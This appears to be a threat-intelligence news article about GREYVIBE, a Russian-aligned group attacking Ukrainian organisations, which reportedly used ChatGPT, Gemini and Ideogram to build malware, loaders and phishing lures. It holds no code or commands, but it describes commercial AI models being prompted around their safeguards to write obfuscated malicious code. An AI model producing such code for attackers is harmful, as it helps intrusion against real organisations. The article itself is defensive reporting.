A previously undocumented threat actor with Russian-language origins and alignment with Kremlin geopolitical interests has been formally attributed by WithSecure Labs in a new report published May 29, 2026. The group, designated GREYVIBE, has conducted persistent cyberattacks against Ukrainian military, government, civilian, and business organizations since at least August 2025 — and has done so with substantial assistance from commercial AI platforms, including OpenAI ChatGPT, Google Gemini, and Ideogram AI.

The attribution adds a new actor to an already crowded field of Russian-aligned cyber operations targeting Ukraine but distinguishes itself in one key dimension: GREYVIBE is among the first documented threat actors to integrate AI tools deeply across its entire operation, from malware development to image generation to infrastructure scripting.

Who Is GREYVIBE

GREYVIBE is assessed as a Russian-speaking group operating in the Russian time zone, with activity patterns and targeting priorities that align with Kremlin intelligence interests — specifically the collection of information related to Ukraine in the context of the ongoing Russo-Ukrainian war.

The group’s victim profile is broad: military organizations, government entities, civilian infrastructure, and businesses operating in or related to Ukraine. This wide targeting footprint, combined with the group’s use of multiple delivery vectors and a variety of tools, suggests either a large team or significant AI-assisted operational scaling.

WithSecure’s attribution notes that GREYVIBE “occupies a grey area between cybercrime and state-affiliated activity” — a characterization that has become increasingly common for Russian-linked threat actors since 2022. The Kremlin has long leveraged criminal groups, patriotic hackers, and contract operators alongside its formal intelligence services (FSB, SVR, GRU), creating deliberate ambiguity about which operations are directed and which are merely tolerated or encouraged.

GREYVIBE does not consistently exhibit the operational maturity associated with more seasoned Russian APTs such as Fancy Bear (APT28) or Cozy Bear (APT29). Researchers noted “rookie mistakes” in some operations — infrastructure reuse, OPSEC slips, and inconsistent tradecraft. But the group compensates for its relative immaturity with AI-assisted productivity that lets a smaller or less experienced team punch above its weight.

AI as an Operational Force Multiplier

The most notable aspect of GREYVIBE’s operation is its systematic integration of commercial AI tools:

ChatGPT was used to assist in writing obfuscation routines, generating loader scripts, and developing post-compromise commands. Rather than hiring skilled malware developers or purchasing tools from criminal markets, GREYVIBE used ChatGPT to produce functional malicious code that would otherwise have required significant technical expertise.

Google Gemini contributed to the development of LegionRelay — a custom malware implant used by GREYVIBE across multiple campaigns. Gemini was used at various stages of LegionRelay’s development, likely for generating or refining components of the backdoor’s code.

Ideogram AI — an AI image generation platform — was used to generate images for GREYVIBE’s social engineering lures, including fake Ukrainian websites used to deliver malware to targets. The use of an AI image tool to generate convincing Ukrainian-language visual content (rather than ripping and reusing stolen images) suggests the group prioritized believability in its lure materials.

The use of ChatGPT and Gemini for offensive operations is not entirely new — researchers have documented threat actors attempting to abuse AI platforms for code generation and social engineering since 2023. But GREYVIBE’s documented use across the full attack lifecycle — from malware development to lure creation to infrastructure scripting — represents one of the most comprehensive documented examples of commercial AI integration in a state-aligned APT operation.

Both OpenAI and Google have stated policies against using their platforms for cyberattacks, and both companies actively attempt to detect and block misuse. But AI systems can be manipulated through prompt engineering to generate code that doesn’t overtly declare its malicious purpose, and determined actors have demonstrated they can extract useful offensive outputs from commercial models.

Attack Vectors and Delivery

GREYVIBE used multiple, diverse delivery mechanisms across its campaigns — a pattern that WithSecure attributes in part to the group’s AI-assisted development capability, which allows rapid iteration on different approaches without the traditional overhead of building each technique from scratch.

Spear-phishing emails remain the group’s primary vector. Targets receive emails with Ukrainian-language lures relevant to their roles — military logistical updates, government administrative notices, business communications. The emails deliver malicious attachments or links that lead to LegionRelay or other GREYVIBE implants.

Fake CAPTCHA pages — a technique with parallels to the ClickFix campaigns documented elsewhere — were used to deliver malware to less targeted victims, presenting a fake browser security challenge that instructs the visitor to execute a command.

Fraudulent Ukrainian adult club websites were used as a delivery mechanism for a subset of targets, likely combining social engineering with drive-by download or credential phishing. The use of AI-generated images for these sites allowed GREYVIBE to produce convincing Ukrainian-language content without native language proficiency or access to stolen Ukrainian web content.

LegionRelay

LegionRelay is GREYVIBE’s primary custom implant, developed with AI assistance. WithSecure’s report does not publish full technical indicators to avoid tipping off the group to the extent of the attribution, but describes LegionRelay as a backdoor with standard remote access capabilities: command execution, file transfer, and persistence mechanisms.

The implant’s name and the group’s overall naming conventions suggest a degree of self-consciousness about operational identity — characteristics that sometimes accompany groups transitioning from opportunistic criminal activity to more organized, mission-oriented operations.

Why This Matters Beyond Ukraine

GREYVIBE’s primary focus is Ukraine, but its AI-assisted development model has implications beyond the current conflict. The group demonstrates that a threat actor with modest resources and technical capability — willing to make rookie mistakes — can significantly extend its operational reach using freely available AI tools.

If GREYVIBE can develop custom malware, generate convincing lure content, and build attack infrastructure using ChatGPT and Gemini, smaller criminal groups, hacktivists, and state-sponsored actors in less technically advanced nations can do the same. The barrier to entry for sophisticated-looking cyberattacks is declining, and GREYVIBE is a live case study in what that looks like in practice.

For defenders, the implication is that behavioral indicators — what an implant does, how it communicates, what it accesses — matter more than ever, since the code itself may be generated and regenerated quickly in ways that defeat signature-based detection.

Sources